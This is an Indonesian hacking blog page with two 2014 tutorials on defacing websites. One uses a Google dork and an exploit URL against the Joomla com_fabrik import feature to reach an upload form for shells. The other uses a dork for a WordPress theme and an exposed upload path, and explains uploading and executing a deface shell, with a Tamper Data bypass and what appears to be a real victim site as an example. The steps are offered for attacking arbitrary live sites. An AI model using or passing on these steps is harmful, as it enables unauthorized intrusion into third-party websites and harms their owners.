Saturday, August 9, 2014

Cara Deface Web Dengan Exploit Com Fabrik

Masih membahas tentang deface. 
Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut. Ok simak tutorial berikut.

 1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik

 2. Akan ada banyak web, anda buka terserah yang mana

 3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

 4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini

 http://1.bp.blogspot.com/-O8NtWBE6Ga8/UX4hzSfRNTI/AAAAAAAAB0U/7GyMI39JQ3A/s400/cats.jpg
Posted by at No comments:

Sunday, August 3, 2014

Tutorial deface via wp-content



walaupun tutor ini udah lama alias jadul, jadi gak ada salahnya jika admin berbagi ke orang yang belum tau dan baru mendalami dunia hacking. di sini admin akan bernagi cara deface wordpress melalui bug uploadnya..
pertama kalian harus bisa mencari web/site yang vuln dengan menggunakan dork wp-content.
Dork yang akan kita gunakan yaitu :

 inurl:/wp-content/themes/KidzStore

Dork di atas bisa di kembangkan sendiri.

cara menggunakan dorknya :
Copy dork di atas ke google, kemudian pilih salah satu site yang muncul.
setelah ada site yang di pilih sebagai target kita, maka kita gunakan exploit :

http://site.com/wp-content/themes/WPStore/upload

nah, kalau sudah muncul halaman upload, kita coba upload shell deface kita (PHP, html,jpg, atau txt)
Jika shell php gak bisa, maka ganti dengan shell html atau lainnya. Pada beberapa site bisa diakali dengan menggunakan Plugin Mozilla FireFox yakni Tamper Data (bisa di download di web resmi mozilla)

setelah sukses mengupload shell kita (ada tulisan Uploaded Successfully), sekarang saatnya kita mengeksekusinya dengan cara :

http://site.com/wp-content/uploads/products_img/[file]

Ex : http://farmershowcase.com/wp-content/uploads/products_img/bn.jpg

Jika masih bingung, silahkan bertanya.

Maaf tidak di sertakan ScreenShotnya...
Posted by at 1 comment:
Subscribe to: Posts (Atom)
 
GFI Team © 2011 Templates | uzanc